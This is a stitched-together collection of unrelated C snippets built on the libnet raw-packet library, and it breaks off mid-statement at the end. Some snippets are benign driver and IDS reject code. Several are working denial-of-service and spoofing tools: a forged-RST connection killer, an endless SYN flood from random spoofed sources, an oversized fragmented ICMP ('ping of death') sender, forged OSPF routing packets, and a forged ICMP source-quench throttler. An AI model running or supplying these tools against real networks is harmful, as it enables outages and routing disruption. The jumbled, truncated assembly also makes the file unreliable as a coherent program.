void nids_killtcp_seq(struct tcp_stream *a_tcp, int seqoff) { char buf[IP_H + TCP_H]; if (libnetsock == 0) return; libnet_build_ip(TCP_H, 0, 12345, 0, 64, IPPROTO_TCP, a_tcp->addr.saddr, a_tcp->addr.daddr, 0, 0, buf); libnet_build_tcp(a_tcp->addr.source, a_tcp->addr.dest, a_tcp->client.first_data_seq + a_tcp->server.count + a_tcp->server.urg_count + (seqoff?(a_tcp->server.window/2):0), 0, 0x4, 32000, 0, 0, 0, buf + IP_H); libnet_do_checksum(buf, IPPROTO_TCP, TCP_H); libnet_write_ip(libnetsock, buf, TCP_H + IP_H); libnet_build_ip(TCP_H, 0, 12345, 0, 64, IPPROTO_TCP, a_tcp->addr.daddr, a_tcp->addr.saddr, 0, 0, buf); libnet_build_tcp(a_tcp->addr.dest, a_tcp->addr.source, a_tcp->server.first_data_seq + a_tcp->client.count + a_tcp->client.urg_count + (seqoff?(a_tcp->client.window/2):0), 0, 0x4, 32000, 0, 0, 0, buf + IP_H); libnet_do_checksum(buf, IPPROTO_TCP, TCP_H); libnet_write_ip(libnetsock, buf, TCP_H + IP_H); }
int send_tcp(struct libnet_link_int *l, u_char *device, u_long src_ip, u_short src_prt, u_long dst_ip, u_short dst_prt) { int n; u_char *buf; if (libnet_init_packet(LIBNET_TCP_H + LIBNET_IP_H + LIBNET_ETH_H, &buf) == -1) { perror("no packet memory"); exit(EXIT_FAILURE); } /* * Ethernet header */ libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_IP, NULL, 0, buf); libnet_build_ip(LIBNET_TCP_H, 0, 242, 0, 64, IPPROTO_TCP, src_ip, dst_ip, NULL, 0, buf + LIBNET_ETH_H); libnet_build_tcp(src_prt, dst_prt, 111111, 999999, TH_SYN, 32767, 0, NULL, 0, buf + LIBNET_IP_H + LIBNET_ETH_H); libnet_do_checksum(buf + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H); libnet_do_checksum(buf + LIBNET_ETH_H, IPPROTO_TCP, LIBNET_TCP_H); n = libnet_write_link_layer(l, device, buf, LIBNET_ETH_H + LIBNET_IP_H + LIBNET_TCP_H); if (n != LIBNET_ETH_H + LIBNET_IP_H + LIBNET_TCP_H) { fprintf(stderr, "Oopz. Only wrote %d bytes\n", n); } else { printf("Wrote %d byte TCP packet through linktype %d\n", n, l->linktype); } libnet_destroy_packet(&buf); return (n); }
int init(void) { /* Ethernet header */ etherhdr.ether_type = ETHERTYPE_IP; /* Ethernet type IP */ memset(etherhdr.ether_shost, 0, 6); /* Ethernet source address */ memset(etherhdr.ether_dhost, 0xff, 6); /* Ethernet destination address */ /* IP header */ memset(&iphdr.ip_src.s_addr, 0, 4); /* IP source address 0.0.0.0 * (pretend to be proxy to * avoid being elected as master) */ inet_aton(MCAST_ALL_HOSTS, &iphdr.ip_dst); /* IP destination address */ iphdr.ip_tos = 0; /* IP type of services */ iphdr.ip_id = (u_int16_t)libnet_get_prand(PRu16); /* IP ID */ iphdr.ip_p = IPPROTO_IGMP; /* IP protocol IGMP */ iphdr.ip_off = 0; /* IP fragmentation offset */ iphdr.ip_ttl = 1; /* IP TTL - set to 1 purposely */ /* IGMP header */ igmphdr.igmp_type = IGMP_MEMBERSHIP_QUERY; /* IGMP type */ igmphdr.igmp_code = 0; /* IGMP code */ inet_aton(MCAST_MDNS, &igmphdr.igmp_group); /* IGMP group address */ /* Create packet */ linkint = libnet_open_link_interface(LINK_INTERFACE, errbuf); if (linkint == NULL) { return -1; } igmp_packetlen = LIBNET_ETH_H + LIBNET_IP_H + LIBNET_IGMP_H; if (libnet_init_packet(igmp_packetlen, &pkt) == -1) { return -1; } libnet_build_ethernet(etherhdr.ether_dhost, etherhdr.ether_shost, ETHERTYPE_IP, NULL, 0, pkt); libnet_build_ip(LIBNET_IGMP_H, iphdr.ip_tos, iphdr.ip_id, iphdr.ip_off, iphdr.ip_ttl, iphdr.ip_p, iphdr.ip_src.s_addr, iphdr.ip_dst.s_addr, NULL, 0, pkt + LIBNET_ETH_H); libnet_build_igmp(igmphdr.igmp_type, igmphdr.igmp_code, igmphdr.igmp_group.s_addr, NULL, 0, pkt + LIBNET_ETH_H + LIBNET_IP_H); libnet_do_checksum(pkt + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H); libnet_do_checksum(pkt + LIBNET_ETH_H, IPPROTO_IGMP, LIBNET_IGMP_H); }
int main(int argc, char **argv) { int sock, warn, len; u_char *pack, *to, *from, *neighbor; u_long src, dst, addaid, addrid, nbr, auth[2]; if (argc != 4) help(argv[0]); from = argv[1]; to = argv[2]; neighbor = argv[3]; len = LIBNET_OSPF_H + LIBNET_HELLO_H + LIBNET_IP_H + LIBNET_AUTH_H; pack = (u_char *)malloc(len); sock = libnet_open_raw_sock(IPPROTO_RAW); if (sock == -1) { perror("socket"); free(pack); exit(-1); } src = libnet_name_resolve(from, 0); dst = libnet_name_resolve(to, 0); nbr = libnet_name_resolve(neighbor, 0); addrid = 0x23696969; addaid = 0xc0ffee00; /* GENERIC : FAKE : ETC */ libnet_build_ip(LIBNET_OSPF_H + LIBNET_AUTH_H + LIBNET_HELLO_H, 0x00, 101, IP_DF, 254, IPPROTO_OSPF, src, dst, NULL, 0, pack); auth[0] = 0; auth[1] = 0; libnet_build_ospf(LIBNET_HELLO_H + LIBNET_AUTH_H, LIBNET_OSPF_HELLO, addrid, addaid, LIBNET_OSPF_AUTH_NULL, NULL, 0, pack + LIBNET_IP_H); LIBNET_OSPF_AUTHCPY(pack + LIBNET_IP_H + LIBNET_OSPF_H, auth); libnet_build_ospf_hello(0xffffffff, 2, 0x00, 0x00, 30, src, src, nbr, NULL, 0, pack + LIBNET_IP_H + LIBNET_OSPF_H + LIBNET_AUTH_H); libnet_do_checksum(pack, IPPROTO_OSPF, len); warn = libnet_write_ip(sock, pack, len); if (warn != len) { printf("Error sending: %d bytes written : %s\n", warn, strerror(errno)); free(pack); exit(warn); } else { printf("%d bytes written\n", warn); } free(pack); return (0); }
int main(int argc, char **argv) { int warn, sock, len; u_char *pack; char *from, *to, *adrtr; u_long src, dest, advrouter, addaid, addrid; u_char auth[2]; if (argc != 4) help(argv[0]); from = argv[1]; to = argv[2]; adrtr = argv[3]; sock = libnet_open_raw_sock(IPPROTO_RAW); if (sock == -1) { perror("socket"); exit(-1); } src = libnet_name_resolve(from, 0); dest = libnet_name_resolve(to, 0); advrouter = libnet_name_resolve(adrtr, 0); addaid = 0xc0ffeeb0; addrid = 0xb00f00d0; len = LIBNET_IP_H + LIBNET_OSPF_H + LIBNET_AUTH_H + LIBNET_LSR_H; pack = (u_char *)malloc(len); libnet_build_ip(LIBNET_OSPF_H + LIBNET_AUTH_H + LIBNET_LSR_H, 0x00, (u_short)rand(), IP_DF, 0xff, IPPROTO_OSPF, src, dest, NULL, 0, pack); memset(auth, 0, sizeof(auth)); libnet_build_ospf(LIBNET_AUTH_H + LIBNET_LSR_H, LIBNET_OSPF_LSR, addrid, addaid, LIBNET_OSPF_AUTH_NULL, NULL, 0, pack + LIBNET_IP_H); LIBNET_OSPF_AUTHCPY(pack + LIBNET_IP_H + LIBNET_OSPF_H, auth); libnet_build_ospf_lsr(LIBNET_LS_TYPE_RTR, 0xffffffff, advrouter, NULL, 0, pack + LIBNET_IP_H + LIBNET_OSPF_H + LIBNET_AUTH_H); libnet_do_checksum(pack, IPPROTO_OSPF, len); warn = libnet_write_ip(sock, pack, len); if (warn == -1) { printf("Error writing packet to wire\n"); free(pack); } else { printf("%d bytes written\n", warn); } free(pack); return (0); }
static void send_tcp_window_advertisement(libnet_t *l, struct libnet_ipv4_hdr *ip, struct libnet_tcp_hdr *tcp) { int len; ip->ip_hl = 5; ip->ip_len = htons(LIBNET_IPV4_H + LIBNET_TCP_H); ip->ip_id = libnet_get_prand(LIBNET_PRu16); memcpy(buf, (u_char *)ip, LIBNET_IPV4_H); tcp->th_off = 5; tcp->th_win = htons(MIN_WIN); memcpy(buf + LIBNET_IPV4_H, (u_char *)tcp, LIBNET_TCP_H); libnet_do_checksum(l, buf, IPPROTO_TCP, LIBNET_TCP_H); len = LIBNET_IPV4_H + LIBNET_TCP_H; if (libnet_write_raw_ipv4(l, buf, len) != len) warn("write"); fprintf(stderr, "%s:%d > %s:%d: . ack %lu win %d\n", libnet_addr2name4(ip->ip_src.s_addr, 0), ntohs(tcp->th_sport), libnet_addr2name4(ip->ip_dst.s_addr, 0), ntohs(tcp->th_dport), ntohl(tcp->th_ack), 1); }
int main (int argc, char **argv) { unsigned long fakesrc, target; unsigned char *buf; unsigned char *data; int sock, i, flags, offset, len; if (argc != 2 || !(target = libnet_name_resolve(argv[1], 1))) { fprintf(stderr, "Usage: %s <target>\n", argv[0]); exit(1); } if ((sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1) { perror("raw sock"); exit(1); } /* get random src addr. */ libnet_seed_prand(); fakesrc = libnet_get_prand(LIBNET_PRu32); buf = malloc(LIBNET_IP_H + LIBNET_ICMP_ECHO_H); data = (unsigned char *)malloc(FRAG_LEN); for (i = 0 ; i < 65536 ; i += (LIBNET_ICMP_ECHO_H + FRAG_LEN)) { offset = i; flags = 0; if (offset < 65120) { flags = IP_MF; len = FRAG_LEN; } else len = 410; /* for total reconstructed len of 65538 */ /* make IP header. */ libnet_build_ip(LIBNET_ICMP_ECHO_H + len, 0, 666, flags | (offset >> 3), 64, IPPROTO_ICMP, fakesrc, target, NULL, 0, buf); /* make ICMP packet. */ libnet_build_icmp_echo(8, 0, 666, 666, data, len, buf + LIBNET_IP_H); /* calculate ICMP checksum. */ libnet_do_checksum(buf, IPPROTO_ICMP, LIBNET_ICMP_ECHO_H + len); /* send it. */ libnet_write_ip(sock, buf, LIBNET_IP_H + LIBNET_ICMP_ECHO_H + len); /* tcpdump-style jonks. */ printf("%s > %s: (frag 666:%d@%d%s)\n", libnet_host_lookup(fakesrc,0), argv[1], LIBNET_ICMP_ECHO_H + len, offset, flags ? "+" : ""); } free(buf); return (EXIT_SUCCESS); }
void write_icmpether(struct libnet_link_int *iface, char *dev, struct eth_pair *dst, struct eth_pair *src) { unsigned char pkt[ETH_H + IP_H + ICMP_ECHO_H]; libnet_build_ethernet(dst->eth, src->eth, ETHERTYPE_IP, NULL, 0, pkt); libnet_build_ip(ICMP_ECHO_H, 0, 0, 0, 2, IPPROTO_ICMP, src->ip, dst->ip, NULL, 0, pkt + ETH_H); libnet_build_icmp_echo(ICMP_ECHO, 0, 0, 0, NULL, 0, pkt + ETH_H + IP_H); if(libnet_do_checksum(pkt+ETH_H, IPPROTO_IP, IP_H) == -1) perror("ipv4 cksum"); if(libnet_do_checksum(pkt+ETH_H, IPPROTO_ICMP, ICMP_ECHO_H) == -1) perror("ipv4 cksum"); if(libnet_write_link_layer(iface, dev, pkt, sizeof(pkt)) != sizeof(pkt)) perror("Write link layer"); }
void write_ipether(struct libnet_link_int *iface, char *dev, struct eth_pair *src) { unsigned char pkt[ETH_H + IP_H + UDP_H]; struct eth_pair *dst = get_dest(); libnet_build_ethernet(dst->eth, src->eth, ETHERTYPE_IP, NULL, 0, pkt); libnet_build_ip(UDP_H, 0, 0, 0, 2, IPPROTO_UDP, src->ip, dst->ip, NULL, 0, pkt + ETH_H); libnet_build_udp(rand() % (0xffff-1024) + 1024, rand() % 1024, NULL, 0, pkt + ETH_H + IP_H); if(libnet_do_checksum(pkt+ETH_H, IPPROTO_IP, IP_H) == -1) perror("ipv4 cksum"); if(libnet_do_checksum(pkt+ETH_H, IPPROTO_UDP, UDP_H) == -1) perror("ipv4 cksum"); if(libnet_write_link_layer(iface, dev, pkt, sizeof(pkt)) != sizeof(pkt)) perror("Write link layer"); }
int libnet_win32_write_raw_ipv4(libnet_t *l, const uint8_t *payload, uint32_t payload_s) { static BYTE dst[ETHER_ADDR_LEN]; static BYTE src[ETHER_ADDR_LEN]; uint8_t *packet = NULL; uint32_t packet_s; LPPACKET lpPacket = NULL; DWORD remoteip = 0; DWORD BytesTransfered; NetType type; struct libnet_ipv4_hdr *ip_hdr = NULL; memset(dst, 0, sizeof(dst)); memset(src, 0, sizeof(src)); packet_s = payload_s + l->link_offset; packet = (uint8_t *)malloc(packet_s); if (packet == NULL) { snprintf(l->err_buf, LIBNET_ERRBUF_SIZE, "%s(): failed to allocate packet\n", __func__); return (-1); } /* we have to do the IP checksum */ if (libnet_do_checksum(l, payload, IPPROTO_IP, LIBNET_IPV4_H) == -1) { /* error msg set in libnet_do_checksum */ return (-1); } /* MACs, IPs and other stuff... */ ip_hdr = (struct libnet_ipv4_hdr *)payload; memcpy(src, libnet_get_hwaddr(l), sizeof(src)); remoteip = ip_hdr->ip_dst.S_un.S_addr; /* check if the remote station is the local station */ if (remoteip == libnet_get_ipaddr4(l)) { memcpy(dst, src, sizeof(dst)); } else { memcpy(dst, libnet_win32_get_remote_mac(l, remoteip), sizeof(dst)); } PacketGetNetType(l->lpAdapter, &type); switch(type.LinkType) { case NdisMedium802_3: libnet_win32_build_fake_ethernet(dst, src, ETHERTYPE_IP, payload, payload_s, packet, l , 0); break; case NdisMedium802_5: libnet_win32_build_fake_token(dst, src, ETHERTYPE_IP, payload, payload_s, packet, l, 0); break; case NdisMediumFddi: break; case NdisMediumWan: case NdisMediumAtm: case NdisMediumArcnet878_2: default: snprintf(l->err_buf, LIBNET_ERRBUF_SIZE, "%s(): network type (%d) is not supported\n", __func__, type.LinkType); return (-1); break; } BytesTransfered = -1; if ((lpPacket = PacketAllocatePacket()) == NULL) { snprintf(l->err_buf, LIBNET_ERRBUF_SIZE, "%s(): failed to allocate the LPPACKET structure\n", __func__); return (-1); } PacketInitPacket(lpPacket, packet, packet_s); /* PacketSendPacket returns a BOOLEAN */ if (PacketSendPacket(l->lpAdapter, lpPacket, TRUE)) { BytesTransfered = packet_s; } PacketFreePacket(lpPacket); free(packet); return (BytesTransfered); }
/* * Function: static void RejectSocket * * Purpose: send a reject packet (tcp-reset or icmp-unreachable * * Args: none * * Returns: nothing void function */ static void RejectSocket(void) { IPHdr *iph; TCPHdr *tcph; ICMPHdr *icmph; int proto; int size = 0; int payload_len = 0; iph = (IPHdr *)l_tcp; proto = tmpP->iph->ip_proto; iph->ip_src.s_addr = tmpP->iph->ip_dst.s_addr; iph->ip_dst.s_addr = tmpP->iph->ip_src.s_addr; switch(proto) { case IPPROTO_TCP: if (!tmpP->frag_flag) { size = IP_H + TCP_H; iph = (IPHdr *)l_tcp; tcph = (TCPHdr *)(l_tcp + IP_H); iph->ip_src.s_addr = tmpP->iph->ip_dst.s_addr; iph->ip_dst.s_addr = tmpP->iph->ip_src.s_addr; tcph->th_sport = tmpP->tcph->th_dport; tcph->th_dport = tmpP->tcph->th_sport; tcph->th_seq = tmpP->tcph->th_ack; tcph->th_ack = htonl(ntohl(tmpP->tcph->th_seq) + 1); //printf("Send TCP Rst in IP-mode.\n"); /* calculate the checksum */ if (libnet_do_checksum(l_tcp, IPPROTO_TCP, TCP_H) == -1) { libnet_error(LIBNET_ERR_CRITICAL, "SendTCPRST: libnet_do_checksum"); return; } /* write it to the socket */ if(libnet_write_ip(libnet_nd, l_tcp, size) < size) { libnet_error(LIBNET_ERR_CRITICAL, "SendTCPRST: libnet_write_ip"); return; } } /* end if !tmpP->frag_flag */ break; case IPPROTO_UDP: if (!tmpP->frag_flag) { iph = (IPHdr *)l_icmp; icmph = (ICMPHdr *)(l_icmp + IP_H); iph->ip_src.s_addr = tmpP->iph->ip_dst.s_addr; iph->ip_dst.s_addr = tmpP->iph->ip_src.s_addr; if ((payload_len = ntohs(tmpP->iph->ip_len) - (IP_HLEN(tmpP->iph) << 2)) > 8) { payload_len = 8; } memcpy((char *)icmph + ICMP_UNREACH_H, tmpP->iph, (IP_HLEN(tmpP->iph) << 2) + payload_len); size = IP_H + ICMP_UNREACH_H + (IP_HLEN(tmpP->iph) << 2) + payload_len; iph->ip_len = htons(size); /* calculate checksums */ if (libnet_do_checksum(l_icmp, IPPROTO_ICMP, size - IP_H) == -1) { libnet_error(LIBNET_ERR_CRITICAL, "SendICMPRST: libnet_do_checksum failed for IPPROTO_ICMP"); return; } /* finally write to socket */ if(libnet_write_ip(libnet_nd, l_icmp, size) < size) { libnet_error(LIBNET_ERR_CRITICAL, "SendICMPRST: libnet_write_ip"); return; } } /* end if !tmpP->frag_flag */ break; } /* end switch(proto) */ }
int main(int argc, char **argv) { int sock, warn, len; u_char *pack; char *from, *to; u_long src, dst, addrid, addaid, auth[2]; if (argc != 3) help(argv[0]); len = LIBNET_IP_H + LIBNET_OSPF_H + LIBNET_AUTH_H + LIBNET_LSA_H + LIBNET_LS_NET_LEN; pack = (u_char *)malloc(len); from = argv[1]; to = argv[2]; src = libnet_name_resolve(from, 0); dst = libnet_name_resolve(to, 0); addrid = 0xff00ff00; addaid = 0xd00dd00d; sock = libnet_open_raw_sock(IPPROTO_RAW); if (sock == -1) { perror("socket"); free(pack); exit(sock); } libnet_build_ip(LIBNET_OSPF_H + LIBNET_AUTH_H + LIBNET_LSA_H + LIBNET_LS_NET_LEN, 0x00, (u_short)rand(), IP_DF, 0xfe, IPPROTO_OSPF, src, dst, NULL, 0, pack); libnet_build_ospf(LIBNET_AUTH_H + LIBNET_LSA_H + LIBNET_LS_NET_LEN, LIBNET_OSPF_LSA, addrid, addaid, LIBNET_OSPF_AUTH_NULL, NULL, 0, pack + LIBNET_IP_H); memset(auth, 0, sizeof(auth)); LIBNET_OSPF_AUTHCPY(pack + LIBNET_OSPF_H + LIBNET_IP_H, auth); libnet_build_ospf_lsa(40, 0x00, LIBNET_LS_TYPE_NET, addrid, src, 0xf0f0f00f, LIBNET_LS_NET_LEN, NULL, 0, pack + LIBNET_AUTH_H + LIBNET_OSPF_H + LIBNET_IP_H); libnet_build_ospf_lsa_net(0xffffff00, 0xc0ffee00, NULL, 0, pack + LIBNET_LSA_H + LIBNET_AUTH_H + LIBNET_OSPF_H + LIBNET_IP_H); libnet_do_checksum(pack, IPPROTO_OSPF, len); libnet_do_checksum(pack + LIBNET_IP_H + LIBNET_OSPF_H + LIBNET_AUTH_H, IPPROTO_OSPF_LSA, LIBNET_LS_NET_LEN + LIBNET_LSA_H); warn = libnet_write_ip(sock, pack, len); if (warn == -1) { printf("Error writing packet to the wire\n"); free(pack); exit(warn); } printf("%d bytes written\n", warn); free(pack); return (0); }
int send_icmp(struct libnet_link_int *l, u_char *device, u_long src_ip, u_long dst_ip) { int n; u_char *buf; if (libnet_init_packet(LIBNET_ICMP_MASK_H + LIBNET_IP_H + LIBNET_ETH_H, &buf) == -1) { perror("no packet memory"); exit(EXIT_FAILURE); } /* * Ethernet header */ libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_IP, NULL, 0, buf); libnet_build_ip(LIBNET_ICMP_MASK_H, 0, /* IP tos */ 242, /* IP ID */ 0, /* Frag */ 64, /* TTL */ IPPROTO_ICMP, /* Transport protocol */ src_ip, /* Source IP */ dst_ip, /* Destination IP */ NULL, /* Pointer to payload (none) */ 0, buf + LIBNET_ETH_H); /* Packet header memory */ libnet_build_icmp_mask(ICMP_MASKREPLY, /* type */ 0, /* code */ 242, /* id */ 0, /* seq */ 0xffffffff, /* mask */ NULL, /* payload */ 0, /* payload_s */ buf + LIBNET_ETH_H + LIBNET_IP_H); libnet_do_checksum(buf + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H); libnet_do_checksum(buf + LIBNET_ETH_H, IPPROTO_ICMP, LIBNET_ICMP_MASK_H); printf("Packet as it will appear on the wire (give or take some byte ordering):"); libnet_hex_dump(buf, LIBNET_ETH_H + LIBNET_IP_H + LIBNET_ICMP_MASK_H, 0, stdout); printf("\n"); n = libnet_write_link_layer(l, device, buf, LIBNET_ETH_H + LIBNET_IP_H + LIBNET_ICMP_MASK_H); if (n != LIBNET_ETH_H + LIBNET_IP_H + LIBNET_ICMP_MASK_H) { fprintf(stderr, "Oopz. Only wrote %d bytes\n", n); } else { printf("Wrote %d byte ICMP packet through linktype %d\n", n, l->linktype); } libnet_destroy_packet(&buf); return (n); }
int main (int argc, char **argv) { u_long src_ip, /* source address */ dst_ip; /* destination address */ u_short src_port, /* source port */ dst_port, /* destination port */ id; /* dns id we are spoofing */ int written_bytes, /* number of bytes written */ packet_size, /* size of our packet */ payload_size, /* size of our payload */ socket; /* socket to write on */ u_char *packet, /* we build this */ *payload; /* we send this */ if (argc < 6) { printf("\nusage: ask_dns <source_ip> <port> <destination_ip> <port> <dns_id>\n"); exit (EXIT_FAILURE); } if ((socket = libnet_open_raw_sock(IPPROTO_RAW)) == -1) libnet_error(LIBNET_ERR_FATAL, "network initialization failed\n"); src_ip = libnet_name_resolve(argv[1], 0); dst_ip = libnet_name_resolve(argv[3], 0); src_port = (u_short) atoi(argv[2]); dst_port = (u_short) atoi(argv[4]); id = (u_short) atoi(argv[5]); payload = "\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01"; payload_size = 21; /* * packet memory allocation */ packet_size = payload_size + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H; libnet_init_packet(packet_size, &packet); if (packet == NULL) libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n"); /* * ip header construction */ libnet_build_ip(payload_size + LIBNET_UDP_H + LIBNET_DNS_H, 0, /* ip tos */ 0, /* ip id */ 0, /* fragmentation bits */ 64, /* ttl */ IPPROTO_UDP, /* protocol */ src_ip, /* source address */ dst_ip, /* destination address */ NULL, /* payload */ 0, /* payload length */ packet); /* packet buffer */ /* * udp header construction * during debugging i found that we weren't generating the correct * length here, that is why a payload length is included (payload + dns_header) * it really shouldn't be here though */ libnet_build_udp(src_port, /* source port */ dst_port, /* destination port */ NULL, /* payload */ 33, /* payload length */ packet + LIBNET_IP_H); /* * dns header construction */ libnet_build_dns(id, /* dns id */ 0x0100, /* control flags */ 1, /* number of questions */ 0, /* number of answer RR's */ 0, /* number of authority RR's */ 0, /* number of additional RR's */ payload, /* payload */ payload_size, /* payload length */ packet + LIBNET_IP_H + LIBNET_UDP_H); /* * calculate checksum */ libnet_do_checksum (packet, IPPROTO_UDP, packet_size - LIBNET_IP_H); /* * write packet */ written_bytes = libnet_write_ip(socket, packet, packet_size); /* * make sure the number of written bytes jives with what we expect */ if (written_bytes < packet_size) libnet_error(LN_ERR_WARNING, "libnet_write_ip only wrote %d of %d bytes\n", written_bytes, packet_size); /* * we're done with this packet */ libnet_destroy_packet(&packet); /* * we're done writing */ if (libnet_close_raw_sock(socket) == -1) libnet_error(LN_ERR_WARNING, "libnet_close_raw_sock couldn't close the interface"); return (written_bytes == -1 ? EXIT_FAILURE : EXIT_SUCCESS); }
int buildudp(ETHERhdr *eth, IPhdr *ip, UDPhdr *udp, FileData *pd, FileData *ipod, char *device) { int n; u_int32_t udp_packetlen = 0, udp_meta_packetlen = 0; static u_int8_t *pkt; static int sockfd = -1; struct libnet_link_int *l2 = NULL; u_int8_t link_offset = 0; #if !defined(WIN32) int sockbuff = IP_MAXPACKET; #endif if (pd->file_mem == NULL) pd->file_s = 0; if (ipod->file_mem == NULL) ipod->file_s = 0; if (got_link) /* data link layer transport */ { if ((l2 = libnet_open_link_interface(device, errbuf)) == NULL) { nemesis_device_failure(INJECTION_LINK, (const char *)device); return -1; } link_offset = LIBNET_ETH_H; } else { if ((sockfd = libnet_open_raw_sock(IPPROTO_RAW)) < 0) { nemesis_device_failure(INJECTION_RAW, (const char *)NULL); return -1; } #if !defined(WIN32) if ((setsockopt(sockfd, SOL_SOCKET, SO_SNDBUF, (const void *)&sockbuff, sizeof(sockbuff))) < 0) { fprintf(stderr, "ERROR: setsockopt() failed.\n"); return -1; } #endif } udp_packetlen = link_offset + LIBNET_IP_H + LIBNET_UDP_H + pd->file_s + ipod->file_s; udp_meta_packetlen = udp_packetlen - (link_offset + LIBNET_IP_H); #ifdef DEBUG printf("DEBUG: UDP packet length %u.\n", udp_packetlen); printf("DEBUG: IP options size %u.\n", ipod->file_s); printf("DEBUG: UDP payload size %u.\n", pd->file_s); #endif if (libnet_init_packet(udp_packetlen, &pkt) == -1) { fprintf(stderr, "ERROR: Unable to allocate packet memory.\n"); return -1; } if (got_link) libnet_build_ethernet(eth->ether_dhost, eth->ether_shost, ETHERTYPE_IP, NULL, 0, pkt); libnet_build_ip(udp_meta_packetlen, ip->ip_tos, ip->ip_id, ip->ip_off, ip->ip_ttl, ip->ip_p, ip->ip_src.s_addr, ip->ip_dst.s_addr, NULL, 0, pkt + link_offset); libnet_build_udp(udp->uh_sport, udp->uh_dport, pd->file_mem, pd->file_s, pkt + link_offset + LIBNET_IP_H); if (got_ipoptions) { if ((libnet_insert_ipo((struct ipoption *)ipod->file_mem, ipod->file_s, pkt + link_offset)) == -1) { fprintf(stderr, "ERROR: Unable to add IP options, discarding " "them.\n"); } } if (got_link) libnet_do_checksum(pkt + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H + ipod->file_s); libnet_do_checksum(pkt + link_offset, IPPROTO_UDP, LIBNET_UDP_H + pd->file_s + ipod->file_s); if (got_link) n = libnet_write_link_layer(l2, device, pkt, udp_packetlen); else n = libnet_write_ip(sockfd, pkt, udp_packetlen); if (verbose == 2) nemesis_hexdump(pkt, udp_packetlen, HEX_ASCII_DECODE); if (verbose == 3) nemesis_hexdump(pkt, udp_packetlen, HEX_RAW_DECODE); if (n != udp_packetlen) { fprintf(stderr, "ERROR: Incomplete packet injection. Only wrote " "%d bytes.\n", n); } else { if (verbose) { if (got_link) printf("Wrote %d byte UDP packet through linktype %s.\n", n, nemesis_lookup_linktype(l2->linktype)); else printf("Wrote %d byte UDP packet.\n", n); } } libnet_destroy_packet(&pkt); if (got_link) libnet_close_link_interface(l2); else libnet_close_raw_sock(sockfd); return n; }
int main(int argc, char *argv[]) { u_long dest_ip; u_short dest_port; u_char errbuf[LIBNET_ERRBUF_SIZE], *packet; int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H; if(argc < 3) { printf("使用方法:\n%s\t <対象ホスト> <対象ポート>\n", argv[0]); exit(1); } dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // ホスト dest_port = (u_short) atoi(argv[2]); // ポート番号 network = libnet_open_raw_sock(IPPROTO_RAW); // ネットワークインタフェースをオープンする if (network == -1) libnet_error(LIBNET_ERR_FATAL, "can't open network interface. -- this program must run as root.\n"); libnet_init_packet(packet_size, &packet); // パケット用のメモリを割り当てる if (packet == NULL) libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n"); libnet_seed_prand(); // 乱数生成器に種を与える printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip)); while(1) // 永久ループ(CTRL-Cで終了されるまで) { libnet_build_ip(LIBNET_TCP_H, // IPヘッダを除いたパケットのサイズ IPTOS_LOWDELAY, // IP tos libnet_get_prand(LIBNET_PRu16), // IP ID(乱数化) 0, // 断片化 libnet_get_prand(LIBNET_PR8), // TTL (乱数化) IPPROTO_TCP, // トランスポートプロトコル libnet_get_prand(LIBNET_PRu32), // 送信元IP (乱数化) dest_ip, // 宛先IP NULL, // ペイロード(なし) 0, // ペイロード長 packet); // パケットヘッダメモリ libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // 送信元TCPポート (乱数化) dest_port, // 宛先TCPポート libnet_get_prand(LIBNET_PRu32), // シーケンス番号 (乱数化) libnet_get_prand(LIBNET_PRu32), // ACK番号 (乱数化) TH_SYN, // コントロールフラグ (SYNフラグのみ設定) libnet_get_prand(LIBNET_PRu16), // ウィンドウサイズ (乱数化) 0, // 至急ポインタ NULL, // ペイロード (なし) 0, // ペイロード長 packet + LIBNET_IP_H); // パケットヘッダメモリ if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1) libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n"); byte_count = libnet_write_ip(network, packet, packet_size); // パケットを注入する if (byte_count < packet_size) libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written. (%d of %d bytes)", byte_count, packet_size); usleep(FLOOD_DELAY); // FLOOD_DELAYミリ秒待機する } libnet_destroy_packet(&packet); // パケットメモリを解放する if (libnet_close_raw_sock(network) == -1) // ネットワークインタフェースをクローズする libnet_error(LIBNET_ERR_WARNING, "can't close network interface."); return 0; }
void tcp_nice_loop(pcap_t *pd, int sock) { struct pcap_pkthdr pkthdr; struct libnet_ip_hdr *ip; struct libnet_tcp_hdr *tcp; struct libnet_icmp_hdr *icmp; u_char *pkt, buf[IP_H + ICMP_ECHO_H + 128]; int len, nice; libnet_seed_prand(); nice = 160 / Opt_nice; for (;;) { if ((pkt = (char *)pcap_next(pd, &pkthdr)) != NULL) { ip = (struct libnet_ip_hdr *)(pkt + pcap_off); if (ip->ip_p != IPPROTO_TCP) continue; tcp = (struct libnet_tcp_hdr *) ((u_char *)ip + (ip->ip_hl * 4)); if (tcp->th_flags & (TH_SYN|TH_FIN|TH_RST) || ntohs(tcp->th_win) == nice) continue; if (Opt_icmp) { /* Send ICMP source quench. */ len = (ip->ip_hl * 4) + 8; libnet_build_ip(ICMP_ECHO_H + len, 0, libnet_get_prand(PRu16), 0, 64, IPPROTO_ICMP, ip->ip_dst.s_addr, ip->ip_src.s_addr, NULL, 0, buf); icmp = (struct libnet_icmp_hdr *)(buf + IP_H); icmp->icmp_type = 4; icmp->icmp_code = 0; memcpy((u_char *)icmp + ICMP_ECHO_H, (u_char *)ip, len); libnet_do_checksum(buf, IPPROTO_ICMP, ICMP_ECHO_H + len); len += (IP_H + ICMP_ECHO_H); if (libnet_write_ip(sock, buf, len) != len) warn("write"); fprintf(stderr, "%s > %s: icmp: source quench\n", 